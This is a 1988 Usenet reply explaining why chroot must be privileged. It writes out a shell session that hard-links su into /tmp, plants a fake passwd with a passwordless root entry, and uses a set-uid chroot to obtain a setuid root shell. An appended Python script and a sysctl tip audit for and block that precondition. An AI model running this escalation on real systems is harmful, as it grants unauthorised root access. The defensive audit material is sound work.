Xref: utzoo news.admin:4110 news.sysadmin:1728 comp.mail.uucp:2392
Path: utzoo!attcan!uunet!pyrdc!jetson!john
From: john@jetson.UPMA.MD.US (John Owens)
Newsgroups: news.admin,news.sysadmin,comp.mail.uucp
Subject: Re: Dangerous hole in Usenet!
Message-ID: <172@jetson.UPMA.MD.US>
Date: 29 Nov 88 21:19:33 GMT
References: <1971@van-bc.UUCP> <572@comdesign.CDI.COM> <5517@medusa.cs.purdue.edu> <155@ecicrl.UUCP>
Organization: SMART HOUSE Limited Partnership
Lines: 34

In article <155@ecicrl.UUCP>, clewis@ecicrl.UUCP (Chris Lewis) writes:
> Secondly, can someone out there explain why chroot is privileged? Or
> why /etc/chroot isn't setuid?

Hmm.

    % ln /bin/su /tmp/su
    % mkdir /tmp/etc
    % echo root::0:0::/:/sh > /tmp/etc/passwd
    % ln /bin/sh /tmp/sh
    % ln /bin/chown /tmp/chown
    % ln /bin/chmod /tmp/chmod
    % cd /tmp
    % /etc/chroot /tmp /sh
    $ ./su root
    # chown root sh
    # chmod u+s sh
    # exit
    $ exit
    % /tmp/sh
    $ id
    ruid=555 euid=0 gid=101
    $ .....

[Or some variation of the above; please don't pick on details unless
they're fatal to the concept.]

In other words, chroot allows you to fool privileged programs that
rely on files with particular pathnames (/etc/passwd, /etc/group,
/etc/hosts.equiv, /usr/lib/sendmail.cf, /usr/lib/aliases, etc.).

-- 
John Owens		john@jetson.UPMA.MD.US		uunet!jetson!john
+1 301 249 6000		john%jetson.uucp@uunet.uu.net
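
An added example, not part of the original post: a defender's audit for the precondition the session above depends on, namely a set-uid or set-gid file that has an extra hard link, with a flag for names sitting in a group- or world-writable directory. The function names and the sample tree are assumptions made for this illustration; the sample is constructed and uses an empty, non-executable file owned by the caller.

```python
import os
import shutil
import stat
import tempfile

SETID = stat.S_ISUID | stat.S_ISGID

def audit_setid_links(root):
    """Map (device, inode) -> every path under root naming a set-id regular
    file that has more than one hard link."""
    found = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable while walking
            if stat.S_ISREG(st.st_mode) and st.st_mode & SETID and st.st_nlink > 1:
                found.setdefault((st.st_dev, st.st_ino), []).append(path)
    return found

def loosely_writable(path):
    """True if the directory holding path is group- or world-writable,
    i.e. someone other than its owner decides what sits beside the file."""
    mode = os.stat(os.path.dirname(path)).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def build_sample_tree():
    """Constructed sample: bin/su is an empty, non-executable file owned by
    the caller with the set-uid bit on, hard-linked into a mode-1777 tmp/."""
    root = tempfile.mkdtemp(prefix="setid-audit-")
    for d, mode in (("bin", 0o755), ("tmp", 0o1777)):
        os.mkdir(os.path.join(root, d))
        os.chmod(os.path.join(root, d), mode)  # explicit, independent of umask
    target = os.path.join(root, "bin", "su")
    open(target, "w").close()
    os.link(target, os.path.join(root, "tmp", "su"))
    os.chmod(target, 0o4644)  # set-uid bit, no execute bits
    return root

if __name__ == "__main__":
    root = build_sample_tree()
    for (dev, ino), paths in audit_setid_links(root).items():
        for p in sorted(paths):
            flag = "LOOSE DIR" if loosely_writable(p) else "ok dir"
            print(f"dev={dev} ino={ino} {flag:9} {p}")
    shutil.rmtree(root)
```

On Linux, setting the sysctl fs.protected_hardlinks to 1 stops users from hard-linking set-id files they do not own, which removes the first step of the session.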